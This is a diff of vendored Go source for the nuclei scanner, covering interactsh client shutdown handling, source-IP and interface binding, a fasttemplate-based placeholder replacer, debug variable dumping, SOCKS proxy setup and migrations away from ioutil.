127	126		pollDuration: options.PollDuration,
128	127		cooldownDuration: options.CooldownPeriod,
129		-	dataMutex: &sync.RWMutex{},
130	128		}
131	129		return interactClient, nil
132	130		}
		skipped 15 lines
148	146		}
149	147
150	148		func (c *Client) firstTimeInitializeClient() error {
151		-	if c.options.NoInteractsh {
	149	+	if c.options.NoInteractsh \|\|nil == c.requests\|\|nil == c.matchedTemplates\|\|nil == c.interactions\|\|c.IsClosed{
152	150		return nil // do not init if disabled
153	151		}
154	152		interactsh, err := client.New(&client.Options{
		skipped 10 lines
165	163		interactURL := interactsh.URL()
166	164		interactDomain := interactURL[strings.Index(interactURL, ".")+1:]
167	165		gologger.Info().Msgf("Using Interactsh Server: %s", interactDomain)
168		-
169		-	c.dataMutex.Lock()
170	166		c.hostname = interactDomain
171		-	c.dataMutex.Unlock()
172	167
173	168		interactsh.StartPolling(c.pollDuration, func(interaction *server.Interaction) {
174	169		item := c.requests.Get(interaction.UniqueID)
		skipped 29 lines
204	199
205	200		// processInteractionForRequest processes an interaction for a request
206	201		func (c Client) processInteractionForRequest(interaction server.Interaction, data *RequestData) bool {
	202	+	if c.IsClosed{return false}
207	203		data.Event.InternalEvent["interactsh_protocol"] = interaction.Protocol
208	204		data.Event.InternalEvent["interactsh_request"] = interaction.RawRequest
209	205		data.Event.InternalEvent["interactsh_response"] = interaction.RawResponse
		skipped 35 lines
245	241		gologger.Error().Msgf("Could not initialize interactsh client: %s", err)
246	242		}
247	243		})
248		-	if c.interactsh == nil {
	244	+	if c.IsClosed\|\| c.interactsh == nil {
249	245		return ""
250	246		}
251	247		atomic.CompareAndSwapUint32(&c.generated, 0, 1)
		skipped 2 lines
254	250
255	251		// Close closes the interactsh clients after waiting for cooldown period.
256	252		func (c *Client) Close() bool {
	253	+	c.IsClosed = true
	254	+	defer func() {
	255	+	if nil != c.interactions {
	256	+	c.interactions.Clear()
	257	+	c.interactions.Stop()
	258	+	c.interactions = nil
	259	+	}
	260	+	if nil != c.requests {
	261	+	c.requests.Clear()
	262	+	c.requests.Stop()
	263	+	c.requests = nil
	264	+	}
	265	+	if nil != c.matchedTemplates {
	266	+	c.matchedTemplates.Clear()
	267	+	c.matchedTemplates.Stop()
	268	+	c.matchedTemplates = nil
	269	+	}
	270	+	if nil != c.interactshURLs {
	271	+	c.interactshURLs.Clear()
	272	+	c.interactshURLs.Stop()
	273	+	c.interactshURLs = nil
	274	+	}
	275	+	}()
257	276		if c.cooldownDuration > 0 && atomic.LoadUint32(&c.generated) == 1 {
258	277		time.Sleep(c.cooldownDuration)
259	278		}
		skipped 10 lines
270	289		// It accepts data to replace as well as the URL to replace placeholders
271	290		// with generated uniquely for each request.
272	291		func (c *Client) ReplaceMarkers(data string, interactshURLs []string) (string, []string) {
	292	+	if nil == c.interactshURLs\|\|c.IsClosed{return data,interactshURLs}
273	293		for interactshURLMarkerRegex.Match([]byte(data)) {
274	294		url := c.URL()
275	295		interactshURLs = append(interactshURLs, url)
		skipped 12 lines
288	308
289	309		// MakePlaceholders does placeholders for interact URLs and other data to a map
290	310		func (c *Client) MakePlaceholders(urls []string, data map[string]interface{}) {
291		-	data["interactsh-server"] = c.getInteractServerHostname()
	311	+	if c.IsClosed{return}
	312	+	data["interactsh-server"] = c.hostname
	313	+	if nil == c.interactshURLs{return }
292	314		for _, url := range urls {
293	315		if interactshURLMarker := c.interactshURLs.Get(url); interactshURLMarker != nil {
294	316		if interactshURLMarker, ok := interactshURLMarker.Value().(string); ok {
		skipped 31 lines
326	348
327	349		// RequestEvent is the event for a network request sent by nuclei.
328	350		func (c Client) RequestEvent(interactshURLs []string, data RequestData) {
	351	+	if nil==c.interactions\|\|c.IsClosed{return}
329	352		for _, interactshURL := range interactshURLs {
330	353		id := strings.TrimRight(strings.TrimSuffix(interactshURL, c.hostname), ".")
331	354
		skipped 107 lines
439	462		return hex.EncodeToString(h.Sum(nil))
440	463		}
441	464
442		-	func (c *Client) getInteractServerHostname() string {
443		-	c.dataMutex.RLock()
444		-	defer c.dataMutex.RUnlock()
445		-
446		-	return c.hostname
447		-	}
448		-

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/protocolstate/state.go

1	1		package protocolstate
2	2
3	3		import (
	4	+	"fmt"
	5	+	"net"
	6	+
4	7		"github.com/pkg/errors"
5	8
6	9		"github.com/projectdiscovery/fastdialer/fastdialer"
		skipped 9 lines
16	19		return nil
17	20		}
18	21		opts := fastdialer.DefaultOptions
	22	+
	23	+	switch {
	24	+	case options.SourceIP != "" && options.Interface != "":
	25	+	isAssociated, err := isIpAssociatedWithInterface(options.SourceIP, options.Interface)
	26	+	if err != nil {
	27	+	return err
	28	+	}
	29	+	if isAssociated {
	30	+	opts.Dialer = &net.Dialer{
	31	+	LocalAddr: &net.TCPAddr{
	32	+	IP: net.ParseIP(options.SourceIP),
	33	+	},
	34	+	}
	35	+	} else {
	36	+	return fmt.Errorf("source ip (%s) is not associated with the interface (%s)", options.SourceIP, options.Interface)
	37	+	}
	38	+	case options.SourceIP != "":
	39	+	isAssociated, err := isIpAssociatedWithInterface(options.SourceIP, "any")
	40	+	if err != nil {
	41	+	return err
	42	+	}
	43	+	if isAssociated {
	44	+	opts.Dialer = &net.Dialer{
	45	+	LocalAddr: &net.TCPAddr{
	46	+	IP: net.ParseIP(options.SourceIP),
	47	+	},
	48	+	}
	49	+	} else {
	50	+	return fmt.Errorf("source ip (%s) is not associated with any network interface", options.SourceIP)
	51	+	}
	52	+	case options.Interface != "":
	53	+	ifadrr, err := interfaceAddress(options.Interface)
	54	+	if err != nil {
	55	+	return err
	56	+	}
	57	+	opts.Dialer = &net.Dialer{
	58	+	LocalAddr: &net.TCPAddr{
	59	+	IP: ifadrr,
	60	+	},
	61	+	}
	62	+	}
	63	+
19	64		if options.SystemResolvers {
20	65		opts.EnableFallback = true
21	66		}
		skipped 9 lines
31	76		}
32	77		Dialer = dialer
33	78		return nil
	79	+	}
	80	+
	81	+	// isIpAssociatedWithInterface checks if the given IP is associated with the given interface.
	82	+	func isIpAssociatedWithInterface(souceIP, interfaceName string) (bool, error) {
	83	+	addrs, err := interfaceAddresses(interfaceName)
	84	+	if err != nil {
	85	+	return false, err
	86	+	}
	87	+	for _, addr := range addrs {
	88	+	if ipnet, ok := addr.(*net.IPNet); ok {
	89	+	if ipnet.IP.String() == souceIP {
	90	+	return true, nil
	91	+	}
	92	+	}
	93	+	}
	94	+	return false, nil
	95	+	}
	96	+
	97	+	// interfaceAddress returns the first IPv4 address of the given interface.
	98	+	func interfaceAddress(interfaceName string) (net.IP, error) {
	99	+	addrs, err := interfaceAddresses(interfaceName)
	100	+	if err != nil {
	101	+	return nil, err
	102	+	}
	103	+	var address net.IP
	104	+	for _, addr := range addrs {
	105	+	if ipnet, ok := addr.(*net.IPNet); ok && !ipnet.IP.IsLoopback() {
	106	+	if ipnet.IP.To4() != nil {
	107	+	address = ipnet.IP
	108	+	}
	109	+	}
	110	+	}
	111	+	if address == nil {
	112	+	return nil, fmt.Errorf("no suitable address found for interface: `%s`", interfaceName)
	113	+	}
	114	+	return address, nil
	115	+	}
	116	+
	117	+	// interfaceAddresses returns all interface addresses.
	118	+	func interfaceAddresses(interfaceName string) ([]net.Addr, error) {
	119	+	if interfaceName == "any" {
	120	+	return net.InterfaceAddrs()
	121	+	}
	122	+	ief, err := net.InterfaceByName(interfaceName)
	123	+	if err != nil {
	124	+	return nil, errors.Wrapf(err, "failed to get interface: `%s`", interfaceName)
	125	+	}
	126	+	addrs, err := ief.Addrs()
	127	+	if err != nil {
	128	+	return nil, errors.Wrapf(err, "failed to get interface addresses for: `%s`", interfaceName)
	129	+	}
	130	+	return addrs, nil
34	131		}
35	132
36	133		// Close closes the global shared fastdialer
		skipped 6 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/replacer/replacer.go

		skipped 2 lines
3	3		import (
4	4		"strings"
5	5
	6	+	"github.com/valyala/fasttemplate"
	7	+
6	8		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/marker"
7	9		"github.com/projectdiscovery/nuclei/v2/pkg/types"
8	10		)
9	11
10	12		// Replace replaces placeholders in template with values on the fly.
11	13		func Replace(template string, values map[string]interface{}) string {
12		-	var replacerItems []string
13		-
14		-	builder := &strings.Builder{}
15		-	for key, val := range values {
16		-	builder.WriteString(marker.ParenthesisOpen)
17		-	builder.WriteString(key)
18		-	builder.WriteString(marker.ParenthesisClose)
19		-	replacerItems = append(replacerItems, builder.String())
20		-	builder.Reset()
21		-	replacerItems = append(replacerItems, types.ToString(val))
22		-
23		-	builder.WriteString(marker.General)
24		-	builder.WriteString(key)
25		-	builder.WriteString(marker.General)
26		-	replacerItems = append(replacerItems, builder.String())
27		-	builder.Reset()
28		-	replacerItems = append(replacerItems, types.ToString(val))
	14	+	valuesMap := make(map[string]interface{}, len(values))
	15	+	for k, v := range values {
	16	+	valuesMap[k] = types.ToString(v)
29	17		}
30		-	replacer := strings.NewReplacer(replacerItems...)
31		-	final := replacer.Replace(template)
	18	+	replaced := fasttemplate.ExecuteStringStd(template, marker.ParenthesisOpen, marker.ParenthesisClose, valuesMap)
	19	+	final := fasttemplate.ExecuteStringStd(replaced, marker.General, marker.General, valuesMap)
32	20		return final
33	21		}
34	22
		skipped 11 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/utils/vardump/dump.go

1	+	package vardump
2	+
3	+	import (
4	+	"strconv"
5	+	"strings"
6	+
7	+	"github.com/projectdiscovery/nuclei/v2/pkg/types"
8	+	)
9	+
10	+	// DumpVariables writes the truncated dump of variables to a string
11	+	// in a formatted key-value manner.
12	+	//
13	+	// The values are truncated to return 50 characters from start and end.
14	+	func DumpVariables(data map[string]interface{}) string {
15	+	var counter int
16	+
17	+	buffer := &strings.Builder{}
18	+	buffer.Grow(len(data) * 78) // grow buffer to an approximate size
19	+
20	+	builder := &strings.Builder{}
21	+	for k, v := range data {
22	+	valueString := types.ToString(v)
23	+
24	+	counter++
25	+	if len(valueString) > 50 {
26	+	builder.Grow(56)
27	+	builder.WriteString(valueString[0:25])
28	+	builder.WriteString(" .... ")
29	+	builder.WriteString(valueString[len(valueString)-25:])
30	+	valueString = builder.String()
31	+	builder.Reset()
32	+	}
33	+	valueString = strings.ReplaceAll(strings.ReplaceAll(valueString, "\r", " "), "\n", " ")
34	+
35	+	buffer.WriteString("\t")
36	+	buffer.WriteString(strconv.Itoa(counter))
37	+	buffer.WriteString(". ")
38	+	buffer.WriteString(k)
39	+	buffer.WriteString(" => ")
40	+	buffer.WriteString(valueString)
41	+	buffer.WriteString("\n")
42	+	}
43	+	final := buffer.String()
44	+	return final
45	+	}
46	+

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/dns/request.go

		skipped 15 lines
16	16		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/generators"
17	17		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/helpers/eventcreator"
18	18		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/helpers/responsehighlighter"
	19	+	"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/utils/vardump"
19	20		templateTypes "github.com/projectdiscovery/nuclei/v2/pkg/templates/types"
20	21		"github.com/projectdiscovery/nuclei/v2/pkg/utils"
21	22		"github.com/projectdiscovery/retryabledns"
		skipped 24 lines
46	47		vars := GenerateVariables(domain)
47	48		variablesMap := request.options.Variables.Evaluate(vars)
48	49		vars = generators.MergeMaps(variablesMap, vars)
	50	+
	51	+	if request.options.Options.Debug \|\| request.options.Options.DebugRequests {
	52	+	gologger.Debug().Msgf("Protocol request variables: \n%s\n", vardump.DumpVariables(vars))
	53	+	}
49	54
50	55		// Compile each request for the template based on the URL
51	56		compiledRequest, err := request.Make(domain, vars)
		skipped 131 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/headless/engine/engine.go

		skipped 1 lines
2	2
3	3		import (
4	4		"fmt"
5		-	"io/ioutil"
6	5		"net/http"
7	6		"os"
8	7		"runtime"
		skipped 21 lines
30	29
31	30		// New creates a new nuclei headless browser module
32	31		func New(options types.Options) (Browser, error) {
33		-	dataStore, err := ioutil.TempDir("", "nuclei-*")
	32	+	dataStore, err := os.MkdirTemp("", "nuclei-*")
34	33		if err != nil {
35	34		return nil, errors.Wrap(err, "could not create temporary directory")
36	35		}
		skipped 143 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/headless/engine/http_client.go

		skipped 2 lines
3	3		import (
4	4		"context"
5	5		"crypto/tls"
6		-	"fmt"
7	6		"net"
8	7		"net/http"
9	8		"net/http/cookiejar"
10	9		"net/url"
11	10		"time"
12	11
13		-	"github.com/projectdiscovery/nuclei/v2/pkg/protocols/utils"
14		-
15	12		"golang.org/x/net/proxy"
16	13
17	14		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/protocolstate"
	15	+	"github.com/projectdiscovery/nuclei/v2/pkg/protocols/utils"
18	16		"github.com/projectdiscovery/nuclei/v2/pkg/types"
19	17		)
20	18
		skipped 32 lines
53	51		transport.Proxy = http.ProxyURL(proxyURL)
54	52		}
55	53		} else if types.ProxySocksURL != "" {
56		-	var proxyAuth *proxy.Auth
57	54		socksURL, proxyErr := url.Parse(types.ProxySocksURL)
58		-	if proxyErr == nil {
59		-	proxyAuth = &proxy.Auth{}
60		-	proxyAuth.User = socksURL.User.Username()
61		-	proxyAuth.Password, _ = socksURL.User.Password()
	55	+	if proxyErr != nil {
	56	+	return nil, err
	57	+	}
	58	+	dialer, err := proxy.FromURL(socksURL, proxy.Direct)
	59	+	if err != nil {
	60	+	return nil, err
62	61		}
63		-	dialer, proxyErr := proxy.SOCKS5("tcp", fmt.Sprintf("%s:%s", socksURL.Hostname(), socksURL.Port()), proxyAuth, proxy.Direct)
	62	+
64	63		dc := dialer.(interface {
65	64		DialContext(ctx context.Context, network, addr string) (net.Conn, error)
66	65		})
		skipped 20 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/headless/engine/page_actions.go

		skipped 1 lines
2	2
3	3		import (
4	4		"context"
5		-	"io/ioutil"
6	5		"net"
7	6		"net/url"
	7	+	"os"
8	8		"regexp"
9	9		"strconv"
10	10		"strings"
		skipped 337 lines
348	348		if err != nil {
349	349		return errors.Wrap(err, "could not take screenshot")
350	350		}
351		-	err = ioutil.WriteFile(to+".png", data, 0540)
	351	+	err = os.WriteFile(to+".png", data, 0540)
352	352		if err != nil {
353	353		return errors.Wrap(err, "could not write screenshot")
354	354		}
		skipped 296 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/headless/request.go

		skipped 13 lines
14	14		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/helpers/eventcreator"
15	15		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/helpers/responsehighlighter"
16	16		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/interactsh"
	17	+	"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/utils/vardump"
17	18		httpProtocol "github.com/projectdiscovery/nuclei/v2/pkg/protocols/http"
18	19		templateTypes "github.com/projectdiscovery/nuclei/v2/pkg/templates/types"
19	20		)
		skipped 48 lines
68	69		return errors.Wrap(err, couldGetHtmlElementErrorMessage)
69	70		}
70	71		defer instance.Close()
	72	+
	73	+	if request.options.Options.Debug \|\| request.options.Options.DebugRequests {
	74	+	gologger.Debug().Msgf("Protocol request variables: \n%s\n", vardump.DumpVariables(payloads))
	75	+	}
71	76
72	77		instance.SetInteractsh(request.options.Interactsh)
73	78
		skipped 84 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/build_request.go

		skipped 4 lines
5	5		"context"
6	6		"fmt"
7	7		"io"
8		-	"io/ioutil"
9	8		"net"
10	9		"net/http"
11	10		"net/url"
		skipped 5 lines
17	16		"github.com/corpix/uarand"
18	17		"github.com/pkg/errors"
19	18
	19	+	"github.com/projectdiscovery/gologger"
20	20		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/expressions"
21	21		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/generators"
22	22		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/replacer"
	23	+	"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/utils/vardump"
23	24		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/dns"
24	25		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/race"
25	26		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/raw"
26	27		"github.com/projectdiscovery/nuclei/v2/pkg/types"
27	28		"github.com/projectdiscovery/rawhttp"
28	29		"github.com/projectdiscovery/retryablehttp-go"
	30	+	"github.com/projectdiscovery/stringsutil"
29	31		)
30	32
31	33		var (
		skipped 63 lines
95	97		generators.MergeMaps(dynamicValues, GenerateVariables(parsed, trailingSlash)),
96	98		generators.BuildPayloadFromOptions(r.request.options.Options),
97	99		)
	100	+	if r.options.Options.Debug \|\| r.options.Options.DebugRequests {
	101	+	gologger.Debug().Msgf("Protocol request variables: \n%s\n", vardump.DumpVariables(values))
	102	+	}
98	103
99	104		// If data contains \n it's a raw request, process it like raw. Else
100	105		// continue with the template based request flow.
		skipped 11 lines
112	117		if isRawRequest {
113	118		// Get the hostname from the URL section to build the request.
114	119		reader := bufio.NewReader(strings.NewReader(data))
	120	+	read_line:
115	121		s, err := reader.ReadString('\n')
116	122		if err != nil {
117	123		return nil, fmt.Errorf("could not read request: %w", err)
118	124		}
	125	+	// ignore all annotations
	126	+	if stringsutil.HasPrefixAny(s, "@") {
	127	+	goto read_line
	128	+	}
119	129
120	130		parts := strings.Split(s, " ")
121	131		if len(parts) < 3 {
		skipped 140 lines
262	272
263	273		// retryablehttp
264	274		var body io.ReadCloser
265		-	body = ioutil.NopCloser(strings.NewReader(rawRequestData.Data))
	275	+	body = io.NopCloser(strings.NewReader(rawRequestData.Data))
266	276		if r.request.Race {
267	277		// More or less this ensures that all requests hit the endpoint at the same approximated time
268	278		// Todo: sync internally upon writing latest request byte
		skipped 19 lines
288	298		}
289	299
290	300		if reqWithAnnotations, hasAnnotations := r.request.parseAnnotations(rawRequest, req); hasAnnotations {
291		-	req = reqWithAnnotations
292		-	request = request.WithContext(req.Context())
	301	+	request.Request = reqWithAnnotations
293	302		}
294	303
295	304		return &generatedRequest{request: request, meta: generatorValues, original: r.request, dynamicValues: finalValues, interactshURLs: r.interactshURLs}, nil
		skipped 31 lines
327	336		if err != nil {
328	337		return nil, errors.Wrap(err, evaluateHelperExpressionErrorMessage)
329	338		}
330		-	req.Body = ioutil.NopCloser(strings.NewReader(body))
	339	+	req.Body = io.NopCloser(strings.NewReader(body))
331	340		}
332	341		if !r.request.Unsafe {
333	342		setHeader(req, "User-Agent", uarand.GetRandom())
		skipped 85 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/http.go

		skipped 236 lines
237	237		NoTimeout: false,
238	238		FollowRedirects: request.Redirects,
239	239		CookieReuse: request.CookieReuse,
	240	+	Connection: &httpclientpool.ConnectionConfiguration{},
240	241		}
241	242		// If we have request level timeout, ignore http client timeouts
242	243		for _, req := range request.Raw {
		skipped 5 lines
248	249
249	250		// if the headers contain "Connection" we need to disable the automatic keep alive of the standard library
250	251		if _, hasConnectionHeader := request.Headers["Connection"]; hasConnectionHeader {
251		-	connectionConfiguration.Connection = &httpclientpool.ConnectionConfiguration{DisableKeepAlive: false}
	252	+	connectionConfiguration.Connection.DisableKeepAlive = true
252	253		}
253	254
254	255		client, err := httpclientpool.Get(options.Options, connectionConfiguration)
		skipped 117 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/httpclientpool/clientpool.go

		skipped 2 lines
3	3		import (
4	4		"context"
5	5		"crypto/tls"
6		-	"fmt"
7	6		"net"
8	7		"net/http"
9	8		"net/http/cookiejar"
		skipped 3 lines
13	12		"sync"
14	13		"time"
15	14
16		-	"github.com/projectdiscovery/nuclei/v2/pkg/protocols/utils"
17		-
18	15		"github.com/pkg/errors"
19	16		"golang.org/x/net/proxy"
20	17		"golang.org/x/net/publicsuffix"
21	18
22	19		"github.com/projectdiscovery/fastdialer/fastdialer"
23	20		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/protocolstate"
	21	+	"github.com/projectdiscovery/nuclei/v2/pkg/protocols/utils"
24	22		"github.com/projectdiscovery/nuclei/v2/pkg/types"
25	23		"github.com/projectdiscovery/rawhttp"
26	24		"github.com/projectdiscovery/retryablehttp-go"
		skipped 183 lines
210	208		transport.Proxy = http.ProxyURL(proxyURL)
211	209		}
212	210		} else if types.ProxySocksURL != "" {
213		-	var proxyAuth *proxy.Auth
214	211		socksURL, proxyErr := url.Parse(types.ProxySocksURL)
215		-	if proxyErr == nil {
216		-	proxyAuth = &proxy.Auth{}
217		-	proxyAuth.User = socksURL.User.Username()
218		-	proxyAuth.Password, _ = socksURL.User.Password()
	212	+	if proxyErr != nil {
	213	+	return nil, proxyErr
	214	+	}
	215	+	dialer, err := proxy.FromURL(socksURL, proxy.Direct)
	216	+	if err != nil {
	217	+	return nil, err
219	218		}
220		-	dialer, proxyErr := proxy.SOCKS5("tcp", fmt.Sprintf("%s:%s", socksURL.Hostname(), socksURL.Port()), proxyAuth, proxy.Direct)
	219	+
221	220		dc := dialer.(interface {
222	221		DialContext(ctx context.Context, network, addr string) (net.Conn, error)
223	222		})
		skipped 66 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/operators.go

		skipped 66 lines
67	67		case extractors.KValExtractor:
68	68		return extractor.ExtractKval(data)
69	69		case extractors.XPathExtractor:
70		-	return extractor.ExtractHTML(item)
	70	+	return extractor.ExtractXPath(item)
71	71		case extractors.JSONExtractor:
72	72		return extractor.ExtractJSON(item)
73	73		case extractors.DSLExtractor:
		skipped 93 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request_annotations.go

		skipped 101 lines
102	102		value := strings.TrimSpace(duration[1])
103	103		if parsed, err := time.ParseDuration(value); err == nil {
104	104		//nolint:govet // cancelled automatically by withTimeout
105		-	ctx, _ := context.WithTimeout(request.Context(), parsed)
	105	+	ctx, _ := context.WithTimeout(context.Background(), parsed)
106	106		request = request.Clone(ctx)
107	107		}
108	108		} else {
109	109		//nolint:govet // cancelled automatically by withTimeout
110		-	ctx, _ := context.WithTimeout(request.Context(), time.Duration(r.options.Options.Timeout)*time.Second)
	110	+	ctx, _ := context.WithTimeout(context.Background(), time.Duration(r.options.Options.Timeout)*time.Second)
111	111		request = request.Clone(ctx)
112	112		}
113	113		}
		skipped 15 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/utils.go

		skipped 3 lines
4	4		"bytes"
5	5		"compress/gzip"
6	6		"compress/zlib"
	7	+	"context"
7	8		"io"
8		-	"io/ioutil"
9	9		"net/http"
10	10		"net/http/httputil"
11	11		"strings"
		skipped 103 lines
115	115		// dump creates a dump of the http request in form of a byte slice
116	116		func dump(req *generatedRequest, reqURL string) ([]byte, error) {
117	117		if req.request != nil {
	118	+	cloned := req.request.Clone(context.Background())
	119	+
118	120		// Create a copy on the fly of the request body - ignore errors
119	121		bodyBytes, _ := req.request.BodyBytes()
120	122		var dumpBody bool
121	123		if len(bodyBytes) > 0 {
122	124		dumpBody = true
123		-	req.request.Request.ContentLength = int64(len(bodyBytes))
124		-	req.request.Request.Body = ioutil.NopCloser(bytes.NewReader(bodyBytes))
	125	+	cloned.ContentLength = int64(len(bodyBytes))
	126	+	cloned.Body = io.NopCloser(bytes.NewReader(bodyBytes))
125	127		} else {
126		-	req.request.Request.ContentLength = 0
127		-	req.request.Request.Body = nil
128		-	delete(req.request.Request.Header, "Content-length")
	128	+	cloned.ContentLength = 0
	129	+	cloned.Body = nil
	130	+	delete(cloned.Header, "Content-length")
129	131		}
130	132
131		-	dumpBytes, err := httputil.DumpRequestOut(req.request.Request, dumpBody)
	133	+	dumpBytes, err := httputil.DumpRequestOut(cloned, dumpBody)
132	134		if err != nil {
133	135		return nil, err
134	136		}
135		-
136		-	// The original req.Body gets modified indirectly by httputil.DumpRequestOut so we set it again to nil if it was empty
137		-	// Otherwise redirects like 307/308 would fail (as they require the body to be sent along)
138		-	if len(bodyBytes) == 0 {
139		-	req.request.Request.ContentLength = 0
140		-	req.request.Request.Body = nil
141		-	}
142		-
143	137		return dumpBytes, nil
144	138		}
145	139		rawHttpOptions := &rawhttp.Options{CustomHeaders: req.rawRequest.UnsafeHeaders, CustomRawBytes: req.rawRequest.UnsafeRawBytes}
146		-	return rawhttp.DumpRequestRaw(req.rawRequest.Method, reqURL, req.rawRequest.Path, generators.ExpandMapValues(req.rawRequest.Headers), ioutil.NopCloser(strings.NewReader(req.rawRequest.Data)), rawHttpOptions)
	140	+	return rawhttp.DumpRequestRaw(req.rawRequest.Method, reqURL, req.rawRequest.Path, generators.ExpandMapValues(req.rawRequest.Headers), io.NopCloser(strings.NewReader(req.rawRequest.Data)), rawHttpOptions)
147	141		}
148	142
149	143		// handleDecompression if the user specified a custom encoding (as golang transport doesn't do this automatically)
		skipped 43 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/network/request.go

		skipped 22 lines
23	23		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/helpers/responsehighlighter"
24	24		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/interactsh"
25	25		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/replacer"
	26	+	"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/utils/vardump"
26	27		templateTypes "github.com/projectdiscovery/nuclei/v2/pkg/templates/types"
27	28		)
28	29
		skipped 99 lines
128	129
129	130		interimValues := generators.MergeMaps(variables, payloads)
130	131
	132	+	if request.options.Options.Debug \|\| request.options.Options.DebugRequests {
	133	+	gologger.Debug().Msgf("Protocol request variables: \n%s\n", vardump.DumpVariables(interimValues))
	134	+	}
	135	+
131	136		inputEvents := make(map[string]interface{})
132	137		for _, input := range request.Inputs {
133	138		var data []byte
		skipped 56 lines
190	195		}
191	196		request.options.Progress.IncrementRequests()
192	197
193		-	if request.options.Options.Debug \|\| request.options.Options.DebugRequests \|\| request.options.Options.StoreResponse{
	198	+	if request.options.Options.Debug \|\| request.options.Options.DebugRequests \|\| request.options.Options.StoreResponse {
194	199		requestBytes := []byte(reqBuilder.String())
195	200		msg := fmt.Sprintf("[%s] Dumped Network request for %s\n%s", request.options.TemplateID, actualAddress, hex.Dump(requestBytes))
196	201		if request.options.Options.Debug \|\| request.options.Options.DebugRequests {
197		-	gologger.Info().Str("address", actualAddress).Msg(msg)
	202	+	gologger.Info().Str("address", actualAddress).Msg(msg)
198	203		}
199		-	if request.options.Options.StoreResponse{
200		-	request.options.Output.WriteStoreDebugData(address, request.options.TemplateID, request.Type().String(), msg)
	204	+	if request.options.Options.StoreResponse {
	205	+	request.options.Output.WriteStoreDebugData(address, request.options.TemplateID, request.Type().String(), msg)
201	206		}
202	207		if request.options.Options.VerboseVerbose {
203	208		gologger.Print().Msgf("\nCompact HEX view:\n%s", hex.EncodeToString(requestBytes))
		skipped 96 lines
300	305
301	306		func dumpResponse(event output.InternalWrappedEvent, request Request, response string, actualAddress, address string) {
302	307		cliOptions := request.options.Options
303		-	if cliOptions.Debug \|\| cliOptions.DebugResponse \|\| cliOptions.StoreResponse{
	308	+	if cliOptions.Debug \|\| cliOptions.DebugResponse \|\| cliOptions.StoreResponse {
304	309		requestBytes := []byte(response)
305	310		highlightedResponse := responsehighlighter.Highlight(event.OperatorsResult, hex.Dump(requestBytes), cliOptions.NoColor, true)
306	311		msg := fmt.Sprintf("[%s] Dumped Network response for %s\n\n", request.options.TemplateID, actualAddress)
307	312		if cliOptions.Debug \|\| cliOptions.DebugResponse {
308		-	gologger.Debug().Msg(fmt.Sprintf("%s%s", msg, highlightedResponse))
	313	+	gologger.Debug().Msg(fmt.Sprintf("%s%s", msg, highlightedResponse))
309	314		}
310		-	if cliOptions.StoreResponse{
311		-	request.options.Output.WriteStoreDebugData(address, request.options.TemplateID, request.Type().String(), fmt.Sprintf("%s%s", msg, hex.Dump(requestBytes)))
	315	+	if cliOptions.StoreResponse {
	316	+	request.options.Output.WriteStoreDebugData(address, request.options.TemplateID, request.Type().String(), fmt.Sprintf("%s%s", msg, hex.Dump(requestBytes)))
312	317		}
313	318		if cliOptions.VerboseVerbose {
314	319		displayCompactHexView(event, response, cliOptions.NoColor)
		skipped 45 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/protocols.go

		skipped 162 lines
163	163		case extractors.JSONExtractor:
164	164		return extractor.ExtractJSON(itemStr)
165	165		case extractors.XPathExtractor:
166		-	return extractor.ExtractHTML(itemStr)
	166	+	return extractor.ExtractXPath(itemStr)
167	167		case extractors.DSLExtractor:
168	168		return extractor.ExtractDSL(data)
169	169		}
		skipped 32 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/ssl/ssl.go

		skipped 23 lines
24	24		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/generators"
25	25		"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/helpers/eventcreator"
